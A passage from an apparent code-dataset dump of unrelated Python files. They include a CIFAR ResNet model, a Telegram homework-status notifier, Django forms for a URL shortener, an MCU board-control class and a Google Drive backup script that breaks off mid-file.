64\n self.dilation = 1\n self.groups = groups\n self.base_width = width_per_group\n\n if replace_stride_with_dilation is None:\n replace_stride_with_dilation = [False, False, False]\n if len(replace_stride_with_dilation) != 3:\n raise ValueError(\"replace_stride_with_dilation should be None\"\n \"or a 3-element tuple, got {}\".format(replace_stride_with_dilation))\n\n self.conv1 = nn.Conv2d(3, self.inplanes, kernel_size=3, stride=1, padding=3, bias=False)\n self.bn1 = norm_layer(self.inplanes)\n self.relu = nn.ReLU(inplace=True)\n\n # construt residual stacks\n # 1st stack use no striding, no channel doubling (except block expansion)\n # subsequent stacks use stride=2 in its 1st layer, double channels at final stack output\n # to avoid bottleneck in information flow\n self.stack1 = self._make_stack(block, 64, stacks[0], stride=1)\n self.stack2 = self._make_stack(block, 128, stacks[1], stride=2,\n dilate=replace_stride_with_dilation[0])\n self.stack3 = self._make_stack(block, 256, stacks[2], stride=2,\n dilate=replace_stride_with_dilation[1])\n self.stack4 = self._make_stack(block, 512, stacks[3], stride=2,\n dilate=replace_stride_with_dilation[2])\n\n # global average pooling\n self.avgpool = nn.AdaptiveAvgPool2d((1, 1))\n self.fc = nn.Linear(256 * block.expansion, num_classes)\n\n self.dropout = nn.Dropout(p=0.2)\n\n # initialization\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')\n elif isinstance(m, (nn.BatchNorm2d, nn.GroupNorm)):\n nn.init.constant_(m.weight, 1)\n nn.init.constant_(m.bias, 0)\n # zero-initiate the last BN layer in each residual block (basic or bottleneck)\n if zero_init_residual:\n for m in self.modules():\n if isinstance(m, BottleNeck):\n nn.init.constant_(m.bn3.weight, 0)\n elif isinstance(m, BasicBlock):\n nn.init.constant_(m.bn2.weight, 0)\n\n\n def _make_stack(self, block, planes, blocks, stride=1, dilate=False):\n \"\"\"\n Construct a res-block stack\n\n Args:\n block: (BasicBlock or BottleNeck class) building block for res-stack\n planes: (int) number of output channels (equal for all layers in the stack) = planes * block.expansion\n blocks: (int) number of building blocks (layers) in the stack\n stride: (int) if > 1, apply striding to (only) the first layer in the stack\n dilate: (bool) if True enable dilation instead of striding\n\n Structure:\n - 1st layer:\n - if stride > 1, enable striding\n - input = batch_size x self.inplanes x H x H\n - output = batch_size x planes * block.expansion x H/stride x H/stride\n - requires downsampling by conv-1x1\n - subsequent layers:\n - layer_stride =1\n - input = output = batch_size x planes * block.expansion x H/stride x H/stride\n - downsample = None\n\n \"\"\"\n\n norm_layer = self._norm_layer\n downsample = None\n previous_dilation = self.dilation\n\n # use dilation instead of striding if true\n if dilate:\n self.dilation *= stride\n stride = 1\n\n # apply conv-1x1 to input identity if stride > 1 or output channels != input channels for dim. matching\n if stride != 1 or self.inplanes != planes * block.expansion:\n downsample = nn.Sequential(\n conv1x1(self.inplanes, planes * block.expansion, stride),\n norm_layer(planes * block.expansion)\n )\n\n layers = []\n # first layer\n # input = batch_size x self.inplanes x H x H\n # output = batch_size x planes * block.expansion x H/stride x H/stride\n layers.append(block(self.inplanes, planes, stride, downsample, self.groups,\n self.base_width, previous_dilation, norm_layer))\n self.inplanes = planes * block.expansion\n # subsequent layers\n for _ in range(1, blocks):\n # input = output = batch_size x planes * block.expansion x H' x H'\n layers.append(block(self.inplanes, planes, groups=self.groups,\n base_width=self.base_width, dilation=self.dilation,\n norm_layer=norm_layer))\n\n return nn.Sequential(*layers)\n\n\n def _forward_imp1(self, x):\n \"\"\" forward method: no dropout \"\"\"\n # batch_size x 3 x H x H -> 32 x 32 on cifar-10\n x = self.bn1(self.conv1(x)) # batch_size x 64 x H x H -> 32 x 32\n\n x = self.stack1(x) # batch_size x 64*block.expansion x H/2 x H/2 -> 16 x 16\n x = self.stack2(x) # batch_size x 128*block.expansion x H/4 x H/4 -> 8 x 8\n x = self.stack3(x) # batch_size x 256*block.expansion x H/8 x H/8 -> 4 x 4\n\n x = self.avgpool(x) # batch_size x 256*block.expansion x 1 x 1\n x = torch.flatten(x, 1) # batch_size x 256*block.expansion*1*1\n out = self.fc(x) # batch_size x num_classes\n\n return out\n\n def _forward_imp2(self, x):\n \"\"\" forward method: dropout \"\"\"\n # batch_size x 3 x H x H -> 32 x 32 on cifar-10\n x = self.bn1(self.conv1(x)) # batch_size x 64 x H x H -> 32 x 32\n x = self.dropout(x)\n\n x = self.stack1(x) # batch_size x 64*block.expansion x H/2 x H/2 -> 16 x 16\n x = self.dropout(x)\n x = self.stack2(x) # batch_size x 128*block.expansion x H/4 x H/4 -> 8 x 8\n x = self.dropout(x)\n x = self.stack3(x) # batch_size x 256*block.expansion x H/8 x H/8 -> 4 x 4\n x = self.dropout(x)\n\n x = self.avgpool(x) # batch_size x 256*block.expansion x 1 x 1\n x = torch.flatten(x, 1) # batch_size x 256*block.expansion*1*1\n out = self.fc(x) # batch_size x num_classes\n\n return out\n\n def forward(self, x):\n \"\"\" forward method \"\"\"\n return self._forward_imp1(x)\n\n\ndef _resnet(arch, block, layers, pretrained, progress, **kwargs):\n \"\"\"\n Abstract model generator interface\n\n Args:\n arch: (str) architecture of pretrained model\n block: (BasicBlock or BottleNeck) residual block type\n layers: (list) a list of 4 integers each specifying the number of residual blocks for each of the 4 residual stacks\n pretrained: (bool) if true load the weights from pretrained models on ImageNet\n progress: (bool) if true displays a progress bar of the download to stderr\n **kwargs: pointer to additional arguments (e.g., groups, stride, etc.)\n\n \"\"\"\n model = ResNet(block, layers, **kwargs)\n if pretrained:\n state_dict = load_state_dict_from_url(model_urls[arch], progress=progress)\n model.load_state_dict(state_dict)\n return model\n\n@register(name='cifar-resnet18')\ndef resnet18(pretrained=False, progress=True, **kwargs):\n \"\"\" ResNet-18 \"\"\"\n return _resnet('resnet18', BasicBlock, [2, 2, 2, 2], pretrained, progress, **kwargs)\n\n@register(name='cifar-resnet34')\ndef resnet34(pretrained=False, progress=True, **kwargs):\n \"\"\" ResNet-34 \"\"\"\n return _resnet('resnet34', BasicBlock, [3, 4, 6, 3], pretrained, progress, **kwargs)\n\n@register(name='cifar-resnet50')\ndef resnet50(pretrained=False, progress=True, **kwargs):\n \"\"\" ResNet-50 \"\"\"\n return _resnet('resnet50', BottleNeck, [3, 4, 6, 3], pretrained, progress, **kwargs)\n\n@register(name='cifar-resnet101')\ndef resnet101(pretrained=False, progress=True, **kwargs):\n \"\"\" ResNet-101 \"\"\"\n return _resnet('resnet101', BottleNeck, [3, 4, 23, 3], pretrained, progress, **kwargs)\n\n@register(name='cifar-resnet152')\ndef resnet152(pretrained=False, progress=True, **kwargs):\n \"\"\" ResNet-152 \"\"\"\n return _resnet('resnet152', BottleNeck, [3, 8, 36, 3], pretrained, progress, **kwargs)\n\n@register(name='cifar-resnext50_32x4d')\ndef resnext50_32x4d(pretrained=False, progress=True, **kwargs):\n \"\"\"\n ResNeXt-50 32x4d\n layer = 50\n cardinality = 32\n bottleneck base_width = 4 (width_per_group)\n \"\"\"\n kwargs['groups'] = 32\n kwargs['width_per_group'] = 4\n return _resnet('resnext50_32x4', BottleNeck, [3, 4, 6, 4], pretrained, progress, **kwargs)\n\n@register(name='cifar-resnext101_32x8d')\ndef resnext101_32x8d(pretrained=False, progress=True, **kwargs):\n \"\"\"\n ResNeXt-101 32x8d\n layer = 101\n cardinality = 32\n bottleneck base_width = 8\n \"\"\"\n kwargs['groups'] = 32\n kwargs['width_per_group'] = 8\n return _resnet('resnext101_32x8d', BottleNeck, [3, 4, 23, 3], pretrained, progress, **kwargs)\n\n@register(name='cifar-wide_resnet50_2')\ndef wide_resnet50_2(pretrained=False, progress=True, **kwargs):\n \"\"\"\n wide ResNet-50-2\n - model is the same as ResNet-50, except bottleneck base_width is doubled\n \"\"\"\n kwargs['width_per_group'] = 64 * 2\n return _resnet('wide_resnet50_2', BottleNeck, [3, 4, 6, 3], pretrained, progress, **kwargs)\n\n@register(name='cifar-wide_resnet101_2')\ndef wide_resnet101_2(pretrained=False, progress=True, **kwargs):\n \"\"\"\n wide ResNet-101-2\n - model is the same as ResNet-101, except bottleneck base_width is doubled\n \"\"\"\n kwargs['width_per_group'] = 64 * 2\n return _resnet('wide_resnet101_2', BottleNeck, [3, 4, 23, 3], pretrained, progress, **kwargs)\n","sub_path":"model/resnet_cifar.py","file_name":"resnet_cifar.py","file_ext":"py","file_size_in_byte":21709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"155622822","text":"import logging\nimport os\nimport time\n\nimport requests\nimport telegram\nfrom dotenv import load_dotenv\n\nload_dotenv()\n\nlogging.basicConfig(\n level=logging.DEBUG,\n filename='main.log',\n filemode='w',\n format='%(asctime)s, %(levelname)s, %(name)s, %(message)s',\n)\n\nPRAKTIKUM_TOKEN = os.getenv(\"PRAKTIKUM_TOKEN\")\nAPI_URL = 'https://praktikum.yandex.ru/api/user_api/{}'\nTELEGRAM_TOKEN = os.getenv('TELEGRAM_TOKEN')\nCHAT_ID = os.getenv('TELEGRAM_CHAT_ID')\n\n\ndef parse_homework_status(homework: dict) -> str:\n homework_name = homework.get('homework_name')\n homework_status = homework.get('status')\n\n if homework_name is None or homework_status is None:\n message = 'Не удалось получить данные.'\n logging.error(message)\n return message\n\n if homework_status == 'rejected':\n verdict = 'К сожалению в работе нашлись ошибки.'\n elif homework_status == 'approved':\n verdict = ('Ревьюеру всё понравилось, можно '\n 'приступать к следующему уроку.')\n elif homework_status == 'reviewing':\n verdict = 'Работа взята в ревью.'\n else:\n message = (f'У работы \"{homework_name}\" неизвестный '\n f'статус: {homework_status}.')\n logging.error(message)\n return message\n\n return f'У вас проверили работу \"{homework_name}\"!\\n\\n{verdict}'\n\n\ndef get_homework_statuses(current_timestamp: int) -> dict:\n params = {'from_date': current_timestamp, }\n headers = {'Authorization': 'OAuth ' + PRAKTIKUM_TOKEN, }\n\n try:\n api_url = API_URL.format('homework_statuses/')\n homework_statuses = requests.get(api_url, params, headers=headers)\n return homework_statuses.json()\n\n except Exception as e:\n message = f'Не удалось получить данные. Возникла ошибка: {e}.'\n logging.error(message)\n\n return {}\n\n\ndef send_message(message: str, bot_client):\n logging.info('Сообщение отправлено')\n return bot_client.send_message(CHAT_ID, message)\n\n\ndef main():\n bot = telegram.Bot(token=TELEGRAM_TOKEN)\n logging.debug('Бот запущен.')\n timestamp = int(time.time())\n\n while True:\n try:\n homework_statuses = get_homework_statuses(timestamp)\n homeworks = homework_statuses.get('homeworks')\n if homeworks:\n send_message(parse_homework_status(homeworks[0]), bot)\n timestamp = homework_statuses.get('current_date', int(time.time()))\n time.sleep(30)\n\n except Exception as e:\n message = f'Бот столкнулся с ошибкой: {e}'\n logging.error(message)\n send_message(message, bot)\n time.sleep(60)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"notifier-bot.py","file_name":"notifier-bot.py","file_ext":"py","file_size_in_byte":2941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"650786007","text":"#!/usr/bin/env python3\n\nimport collections\nimport pathlib\nimport pickle\nimport sys\n\nimport pandas as pd\nfrom tqdm import tqdm\ntqdm.pandas()\n\nimport utils\n\n# Variables\nVOCABULARY_SIZE = 10000\nTAG_SIZE = 250\n\nOUTPUT_PATH = pathlib.Path(__file__).parent.joinpath('../../output/').resolve()\nOUTPUT_PATH.mkdir(parents=True, exist_ok=True)\n\nif __name__ == '__main__':\n \"\"\"\n Builds vocabulary list and tag list from input dataset\n \"\"\"\n\n dataset = pathlib.Path(sys.argv[1])\n\n vocabulary = collections.Counter()\n tags = collections.Counter()\n\n print(f'Opening {dataset} ...')\n df = pd.read_csv(dataset).dropna()\n\n print(f'Counting words and tags ...')\n words = (w for s in df['body'].astype(str) for w in s.split())\n df['tags'] = df['tags'].str.split(\"|\", expand=False)\n vocabulary.update(words)\n tags.update((t for l in df['tags'] for t in l))\n\n vocabulary = {\n w: i for (w, _), i in zip(vocabulary.most_common(VOCABULARY_SIZE), range(VOCABULARY_SIZE))\n }\n tags = {\n w: i for (w, _), i in zip(tags.most_common(TAG_SIZE), range(TAG_SIZE))\n }\n\n # Saving data\n with (OUTPUT_PATH / 'vocabulary.pkl').open('wb') as f:\n print(f'Saving vocabulary to {f.name} ...')\n pickle.dump(file=f, obj=vocabulary)\n with (OUTPUT_PATH / 'tags.pkl').open('wb') as f:\n print(f'Saving tags to {f.name} ...')\n pickle.dump(file=f, obj=tags)\n","sub_path":"model/src/preprocessing/build_vocabulary.py","file_name":"build_vocabulary.py","file_ext":"py","file_size_in_byte":1409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"347942248","text":"import os\nouFile = open('Tophat-mapping-filter.sh', 'w')\nFs = os.listdir('.')\nL1 = []\nL2 = []\nfor F in Fs:\n if os.path.isdir(F):\n bam = F + '/' + 'accepted_hits.bam'\n bam_filtered = F + '.bam'\n s1 = 'samtools view -bh %s -q 50 -o %s'%(bam, bam_filtered)\n s2 = '#rm %s'%bam\n L1.append(s1)\n L2.append(s2)\nfor item in L1:\n ouFile.write(item + '\\n')\nfor item in L2:\n ouFile.write(item + '\\n')\nouFile.close()\n","sub_path":"mTECs/14-RNASeq/02-mapping/02-quality.py","file_name":"02-quality.py","file_ext":"py","file_size_in_byte":455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"301824181","text":"# Django Imports\nfrom django import forms\nfrom django.core.exceptions import ValidationError\nfrom django.utils.safestring import mark_safe\nfrom django.utils import timezone\n\n# App Imports\nfrom go.models import URL, RegisteredUser\n\n# Other Imports\nfrom crispy_forms.helper import FormHelper\nfrom crispy_forms.layout import Layout, Fieldset, Submit, HTML, Div, Field\nfrom crispy_forms.bootstrap import StrictButton, PrependedText, Accordion, AccordionGroup\nfrom bootstrap3_datetime.widgets import DateTimePicker\nfrom datetime import date, datetime, timedelta\n\n\"\"\"\n The form that is used in URL creation.\n\"\"\"\nclass URLForm(forms.ModelForm):\n\n # Prevent redirect loop links\n def clean_target(self):\n # get the entered target link\n target = self.cleaned_data.get('target')\n # if the host (go.gmu.edu) is in the entered target link\n if self.host in target:\n raise ValidationError(\"You can't make a Go link to Go silly!\")\n else:\n return target\n\n # Custom target URL field\n target = forms.URLField(\n required=True,\n label='Long URL (Required)',\n max_length=1000,\n widget=forms.URLInput(attrs={\n 'placeholder': 'https://yoursite.com/'\n })\n )\n\n # Check to make sure the short url has not been used\n def unique_short(value):\n try:\n # if we're able to get a URL with the same short url\n URL.objects.get(short__iexact=value)\n except URL.DoesNotExist:\n return\n # then raise a ValidationError\n raise ValidationError('Short url already exists.')\n\n # Custom short-url field with validators.\n short = forms.SlugField(\n required = False,\n label = 'Short URL (Optional)',\n widget = forms.TextInput(),\n validators = [unique_short],\n max_length = 20,\n min_length = 3,\n )\n\n # define some string date standards\n DAY = '1 Day'\n WEEK = '1 Week'\n MONTH = '1 Month'\n CUSTOM = 'Custom Date'\n NEVER = 'Never'\n\n # define a tuple of string date standards to be used as our date choices\n EXPIRATION_CHOICES = (\n (DAY, DAY),\n (WEEK, WEEK),\n (MONTH, MONTH),\n (NEVER, NEVER),\n (CUSTOM, CUSTOM),\n )\n\n # Add preset expiration choices.\n expires = forms.ChoiceField(\n required = True,\n label = 'Expiration (Required)',\n choices = EXPIRATION_CHOICES,\n initial = NEVER,\n widget = forms.RadioSelect(),\n )\n\n # Check if the selected date is a valid date\n def valid_date(value):\n # a valid date is one that is greater than today\n if value > timezone.now():\n return\n # raise a ValidationError if the date is invalid\n else:\n raise ValidationError('Date must be after today.')\n\n\n # Add a custom expiration choice.\n expires_custom = forms.DateTimeField(\n required = False,\n label = 'Custom Date',\n input_formats = ['%m-%d-%Y'],\n validators = [valid_date],\n initial = lambda: datetime.now() + timedelta(days=1),\n widget = DateTimePicker(\n options={\n \"format\": \"MM-DD-YYYY\",\n \"pickTime\": False,\n },\n icon_attrs={\n \"class\": \"fa fa-calendar\",\n },\n )\n )\n\n # on initialization of the form, crispy forms renders this layout\n def __init__(self, *args, **kwargs):\n # Grab that host info\n self.host = kwargs.pop('host', None)\n super(URLForm, self).__init__(*args, **kwargs)\n # Define the basics for crispy-forms\n self.helper = FormHelper()\n self.helper.form_method = 'POST'\n\n # Some xtra vars for form css purposes\n self.helper.form_class = 'form-horizontal'\n self.helper.label_class = 'col-md-1'\n self.helper.field_class = 'col-md-6'\n\n # The main \"layout\" defined\n self.helper.layout = Layout(\n Fieldset('',\n #######################\n Accordion(\n # Step 1: Long URL\n AccordionGroup('Step 1: Long URL',\n Div(\n HTML(\"\"\"\n <h4>Paste the URL you would like to shorten:</h4>\n <br />\"\"\"),\n 'target',\n style=\"background: rgb(#F6F6F6);\"),\n active=True,\n template='crispy/accordian-group.html'),\n\n # Step 2: Short URL\n AccordionGroup('Step 2: Short URL',\n Div(\n HTML(\"\"\"\n <h4>Create a custom Go address:</h4>\n <br />\"\"\"),\n PrependedText(\n 'short', 'https://go.gmu.edu/', template='crispy/customPrepended.html'),\n style=\"background: rgb(#F6F6F6);\"),\n active=True,\n template='crispy/accordian-group.html',),\n\n # Step 3: Expiration\n AccordionGroup('Step 3: URL Expiration',\n Div(\n HTML(\"\"\"\n <h4>Set when you would like your Go address to expire:</h4>\n <br />\"\"\"),\n 'expires',\n Field('expires_custom', template=\"crispy/customDateField.html\"),\n style=\"background: rgb(#F6F6F6);\"),\n active=True,\n template='crispy/accordian-group.html'),\n\n # FIN\n template='crispy/accordian.html'),\n #######################\n HTML(\"\"\"\n <br />\"\"\"),\n StrictButton('Shorten', css_class=\"btn btn-primary btn-md col-md-4\", type='submit')))\n\n # metadata about this ModelForm\n class Meta:\n # what model this form is for\n model = URL\n # what attributes are included\n fields = ['target',]\n\n\"\"\"\n The form that is used when a user is signing up to be a RegisteredUser\n\"\"\"\nclass SignupForm(forms.ModelForm):\n\n # The full name of the RegisteredUser\n full_name = forms.CharField(\n required = True,\n label = 'Full Name (Required)',\n max_length = 100,\n widget = forms.TextInput(),\n )\n\n # The RegisteredUser's chosen organization\n organization = forms.CharField(\n required = True,\n label = 'Organization (Required)',\n max_length = 100,\n widget = forms.TextInput(),\n )\n\n # The RegisteredUser's reason for signing up to us Go\n description = forms.CharField(\n required = False,\n label = 'Description (Optional)',\n max_length = 200,\n widget = forms.Textarea(),\n )\n\n # A user becomes registered when they agree to the TOS\n registered = forms.BooleanField(\n required=True,\n # ***Need to replace lower url with production URL*** ie. go.gmu.edu/about#terms\n label = mark_safe('Do you accept the <a href=\"http://127.0.0.1:8000/about#terms\">Terms of Service</a>?'),\n )\n\n # on initialization of the form, crispy forms renders this layout\n def __init__(self, request, *args, **kwargs):\n # Necessary to call request in forms.py, is otherwise restricted to views.py and models.py\n self.request = request\n super(SignupForm, self).__init__(*args, **kwargs)\n self.helper = FormHelper()\n self.helper.form_class = 'form-horizontal'\n self.helper.label_class = 'col-md-4'\n self.helper.field_class = 'col-md-6'\n\n self.helper.layout = Layout(\n Fieldset('',\n Div(\n # Place in form fields\n Div(\n 'full_name',\n 'organization',\n 'description',\n 'registered',\n css_class='well'),\n\n # Extras at bottom\n StrictButton('Submit',css_class='btn btn-primary btn-md col-md-4', type='submit'),\n css_class='col-md-6')))\n\n # metadata about this ModelForm\n class Meta:\n # what model this form is for\n model = RegisteredUser\n # what attributes are included\n fields = ['full_name', 'organization', 'description', 'registered',]\n","sub_path":"go/go/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":8550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"316497872","text":"from __future__ import absolute_import\nimport os\nimport logging\nimport importlib\nimport mbed_lstools\nfrom mcutk.debugger.base import DebuggerBase\nfrom mcutk.pserial.serial import Serial\n\n\ndef getboard(name, **kwargs):\n \"\"\"An entry to get board instance.\n\n Arguments:\n name {string} -- board name\n \"\"\"\n devicename = kwargs.pop(\"devicename\", \"\")\n try:\n boardmodule_path = \"mcutk.board.%s\"%name\n logging.debug(boardmodule_path)\n boardmodule = importlib.import_module(boardmodule_path)\n board = boardmodule.Board(devicename, **kwargs)\n except ImportError as e:\n board = Board(devicename, **kwargs)\n\n logging.debug(str(board))\n board.name = name\n return board\n\n\n\n\nclass Board(object):\n \"\"\"MCUTK base board. Defined common interface & functions.\n This object can be used directly and provide general support for Kinetis series.\n \"\"\"\n def __init__(self, devicename=None, **kwargs):\n \"\"\"Create a mcutk.Board instance.\n\n Arguments:\n devicename {string} -- device name\n interface {string} -- SWD/JTAG\n\n Keyword Arguments:\n debugger_type {string} -- debugger type, choices are defined in\n \"\"\"\n self.name = devicename\n self.devicename = devicename\n self._debugger = None\n self._serial_ports = list()\n\n self.interface = kwargs.get(\"interface\", \"SWD\")\n self.debugger_type = kwargs.get(\"debugger_type\", \"jlink\")\n\n # default gdbport is 3000\n self.gdbport = kwargs.get(\"gdbport\", 3333)\n self.usbid = kwargs.get(\"usbid\")\n self.serial = kwargs.get(\"serial\", \"\")\n self.baudrate = kwargs.get(\"baudrate\", \"115200\")\n self.start_address = kwargs.get(\"start_address\", \"0\")\n\n self.sp = None #\"(0x00000000)\"\n self.pc = None #\"(0x00000004)\"\n self.resource = []\n\n\n def __repr__(self):\n return \"<{0}(name={1.devicename}, usbid={1.usbid})>\".format(self.__class__.__name__, self)\n\n\n def get_mount_point(self):\n \"\"\"Return mount point by matching usbid.\n \"\"\"\n mbeds = mbed_lstools.create()\n mbeds_devices = mbeds.list_mbeds(filter_function=lambda m: m[\"target_id\"] in self.usbid)\n if not mbeds_devices:\n return\n return mbeds_devices[0]['mount_point']\n\n\n def set_serial(self, port, baudrate, **kwargs):\n \"\"\"Set or add serial port to board object, this interface will pass all\n parameters to serial.Serial object. For more details, please refer to pyserial\n documentation: https://pythonhosted.org/pyserial/pyserial_api.html#classes.\n\n Default timeout=1.\n \"\"\"\n if not port:\n return None\n timeout = kwargs.pop('timeout', 1)\n sp = Serial(timeout=timeout, **kwargs)\n sp.port = port\n sp.baudrate = baudrate\n self._serial_ports.append(sp)\n\n\n def get_serial(self, index=0):\n \"\"\"Get serial port instance by index.\n 0 -- main\n 1 -- secondary\n 2 -- third\n\n Arguments:\n index {int} -- the port index.\n\n Returns:\n pyserial, serila.Serial instance,\n \"\"\"\n if not self._serial_ports:\n logging.debug('no serial ports are configured!')\n return None\n\n try:\n return self._serial_ports[index]\n except IndexError:\n return None\n\n def remove_resource(self, res_inst):\n for res in self.resource:\n if id(res[1]) == id(res_inst):\n logging.warning(\"find resource for %s\", id(res_inst))\n self.resource.remove(res)\n\n logging.warning(\"resource for %s not found\", id(res_inst))\n return None\n\n\n def register_resource(self, res_inst, naming):\n \"\"\"\n regist resources to board\n res_init: resource instance\n naming: name string of this resource\n \"\"\"\n res = [naming, res_inst]\n\n self.resource.insert(-1, res)\n\n\n def find_resource_by_name(self, naming):\n \"\"\"\n find a resource by name\n naming: the name of the resource\n return: the first match resource or None\n \"\"\"\n for res in self.resource:\n if res[0] == naming:\n return res[1]\n\n logging.debug(\"resource for %s not found\", naming)\n return None\n\n\n def find_resource_by_type(self, type_string):\n \"\"\"\n find a resource by type\n type_string: the name of resource type(class)\n return: a list of matched resource, otherwise None\n \"\"\"\n ret = []\n for res in self.resource:\n if type(res[1]).__name__ == type_string:\n logging.info(\"find resource for %s\", type_string)\n ret.insert(-1, res[1])\n\n logging.info(\"resource for %s not found\", type_string)\n return None\n\n\n @property\n def debugger(self):\n if not self._debugger:\n raise ValueError(\"debugger is not set!\")\n self._debugger.set_board(self)\n return self._debugger\n\n\n @debugger.setter\n def debugger(self, value):\n if isinstance(value, DebuggerBase):\n self._debugger = value\n else:\n ValueError(\"This not a valid debugger object\")\n\n\n @property\n def gdb_init_commands(self):\n \"\"\"gdb.init is a string include gdb commands.\n\n It will be rendered before execute 'gdb -x gdb.init'.\n Default it is loaded from debugger.gdbinit_template.\n Overwrite this function can custom the commands.\n \"\"\"\n return None\n\n\n @property\n def ser_main(self):\n \"\"\"A shortcut attribute to access the main serial port object.\n \"\"\"\n return self.get_serial(0)\n\n\n @property\n def ser_sec(self):\n \"\"\"A shortcut attribute to access the secondary serial port object.\n \"\"\"\n return self.get_serial(1)\n\n def reset_board_by_send_break(self, serial=None):\n \"\"\"CMSIS-DAP firmware allows the target to be reset by sending a break command\n over the serial port.\n Default use the main serial port.\n \"\"\"\n if serial == None:\n serial = self.ser_main\n\n logging.info('reset board by sending break to port: %s', serial.port)\n _opened_by_me = False\n if not serial.is_open:\n _opened_by_me = True\n serial.open()\n\n try:\n serial.send_break()\n except:\n serial.break_condition = False\n\n # if port status is aligned with the origin.\n if _opened_by_me:\n serial.close()\n\n return True\n\n\n\n def reset(self, method=\"debugger\"):\n \"\"\"Reset board. There are several methos allow user to reset board.\n By default it is debugger method.\n\n Reset method list:\n - debugger: use debugger(JTAG) to reset board\n - serial: send break via serial port\n\n Keyword Arguments:\n method {str} -- [description] (default: {\"debugger\"})\n \"\"\"\n if method == 'serial':\n return self.reset_board_by_send_break()\n\n elif method == \"debugger\":\n assert self.debugger\n return self.debugger.reset()\n\n else:\n raise ValueError('unknow reset method %s'%method)\n\n\n def programming(self, filename, **kwargs):\n \"\"\"Auto program binary to board.\n\n For general situation, it is avaliable for most boards.\n It will choose gdb or general method by filename extension.\n\n params:\n filename: path to image file.\n \"\"\"\n logging.info(\"debugger version %s\", self.debugger.version)\n logging.info(\"programming %s\", filename)\n ext = os.path.splitext(filename)[-1]\n if self.debugger_type in (\"jlink\", 'pyocd'):\n if ext in (\".bin\", \".img\"):\n return self.debugger.flash(filename, self.start_address)\n else:\n return self.debugger.gdb_program(filename, **kwargs)\n else:\n return self.debugger.flash(filename, **kwargs)\n\n\n def check_serial(self):\n \"\"\"Check serial port.\n \"\"\"\n status = \"pass\"\n try:\n self.ser_main.write_timeout = 2\n self.ser_main.open()\n self.ser_main.write(\"A\\r\\n\")\n except Exception as e:\n status = str(e)\n finally:\n if self.ser_main and self.ser_main.is_open:\n self.ser_main.close()\n\n return status\n\n\n","sub_path":"mcutk/board/baseboard.py","file_name":"baseboard.py","file_ext":"py","file_size_in_byte":8521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"210098389","text":"#!/usr/bin/python\n# -*- coding: utf8 -*-\n\nfrom __future__ import print_function, division\n\nimport astropy.io.fits as pyfits\nimport numpy\nimport numpy.fft as fft\nimport matplotlib.pyplot as plt\n\n\n__author__ = 'Bruno Quint'\n\nif __name__ == '__main__':\n\n # Load data\n filename = '/data/BTFI/20140402/BIAS/classic-mode/sbiasA0002.fits'\n header = pyfits.getheader(filename)\n data = pyfits.getdata(filename)\n\n fft_data = fft.fft2(data)\n fft_data = fft.fftshift(fft_data).real\n\n vmin = fft_data.mean() - 3 * fft_data.std()\n vmax = fft_data.mean() + 3 * fft_data.std()\n plt.imshow(fft_data, origin='lower', cmap='coolwarm', interpolation='nearest', vmin=vmin, vmax=vmax)\n plt.colorbar()\n plt.show()\n\n\n\n\n","sub_path":"bias_fft.py","file_name":"bias_fft.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"579350277","text":"from __future__ import print_function\nimport sys\nimport os\nimport time\nfrom googleapiclient.discovery import build\nfrom httplib2 import Http\nfrom oauth2client import file, client, tools\nfrom apiclient.http import MediaFileUpload\nimport datetime;\nimport json\n\n\n# If modifying these scopes, delete the file token.json.\n# full scope : https://www.googleapis.com/auth/drive\nSCOPES = 'https://www.googleapis.com/auth/drive.file'\n\nclass BackupManager:\n now = datetime.datetime.now()\n scopes = 'https://www.googleapis.com/auth/drive.file'\n config_path = 'push2drive_config/config.json'\n credentials_path = 'push2drive_config/credentials.json'\n token_path = 'push2drive_config/token.json'\n config = 0\n drive_service = 0\n\n\n backup_number = 0\n main_folder_id = 0\n destination_folder_id = 0\n backup_folder_id = 0\n\n def __init__(self, path):\n self.config_path = os.path.join(path, 'push2drive_config/config.json')\n self.credentials_path = os.path.join(path, 'push2drive_config/credentials.json')\n\n def read_config(self):\n with open(self.config_path) as json_data_file:\n self.config = json.load(json_data_file)\n return self.config\n\n def connect_drive(self):\n store = file.Storage(self.config['token_path'])\n creds = store.get()\n if not creds or creds.invalid:\n flow = client.flow_from_clientsecrets(self.credentials_path, SCOPES)\n creds = tools.run_flow(flow, store)\n self.drive_service = build('drive', 'v3', http=creds.authorize(Http()))\n\n def check_main_folder(self):\n # Search main backup folder in drive\n main_folder_name = self.config['main_folder_name']\n print('Search main backup folder in drive (name:%s)' % main_folder_name)\n results = self.drive_service.files().list(q=\"name='%s' and mimeType='application/vnd.google-apps.folder'\" % main_folder_name,\n orderBy='createdTime asc',\n spaces='drive',\n fields='nextPageToken, files(id, name)'\n ).execute()\n items = results.get('files', [])\n\n if not items:\n # No Backup folder found by name\n print('Create main folder')\n file_metadata = {\n 'name': main_folder_name,\n 'mimeType': 'application/vnd.google-apps.folder'\n }\n\n main_folder = self.drive_service.files().create(body=file_metadata,\n fields='id').execute()\n self.main_folder_id = main_folder.get('id')\n print('Folder ID: %s' % self.main_folder_id)\n else:\n # Backup folder ok\n for item in items:\n if item['name'] == main_folder_name:\n self.main_folder_id = item['id']\n else:\n print(u'{0} ({1})'.format(item['name'], item['id']))\n \n print('Main folder found (id:%s)' % self.main_folder_id)\n \n if self.main_folder_id == 0:\n raise BaseException('No main folder')\n return 1\n\n def check_destination_folder(self):\n destination_folder_name = self.config['destination_folder_name']\n print('Search destination folder in drive (name:%s)' % destination_folder_name)\n # Backup folder ok\n if self.main_folder_id == 0:\n raise BaseException('No main folder')\n else:\n # Search sub folders\n results = 